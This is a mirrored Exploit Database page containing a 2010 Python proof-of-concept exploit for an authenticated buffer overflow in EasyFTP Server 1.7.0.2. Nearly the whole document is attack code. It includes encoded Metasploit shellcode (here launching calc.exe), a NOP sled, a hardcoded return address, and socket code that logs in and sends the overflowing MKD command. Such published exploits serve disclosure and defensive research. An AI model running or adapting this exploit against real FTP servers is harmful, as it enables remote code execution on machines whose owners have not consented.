EasyFTP Server 1.7.0.2 – (Authenticated) Buffer Overflow (1)

• Exploit Database
• 135 阅读

• 作者： dookie
  日期： 2010-02-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11468/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

  #!/usr/bin/python   # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF # From: The eh?-Team || The Great White Fuzz (we're not sure yet) # Author: dookie2000ca # Date: 14/02/2010 # Found by: loneferret # Date Found: 13/02/2010   # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip # Tested on: Windows XP SP3 Professional   import socket import sys   # msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x2f\x5c' -e x86/shikata_ga_nai -t c # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)   shellcode = ("\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" "\x1b\x35\x1d")   sled = "\x90" * 10 filler = "\x90" * 30 eip = "\x8B\x38\xAB\x71" # 71AB388B JMP EBP WS2_32.DLL trailer = "\x43" * 48   evil = sled + shellcode + filler + eip + trailer   s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.142',21)) s.recv(1024) s.send('USER dookie\r\n') s.recv(1024) s.send('PASS dookie\r\n') s.recv(1024) s.send('MKD ' + evil + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close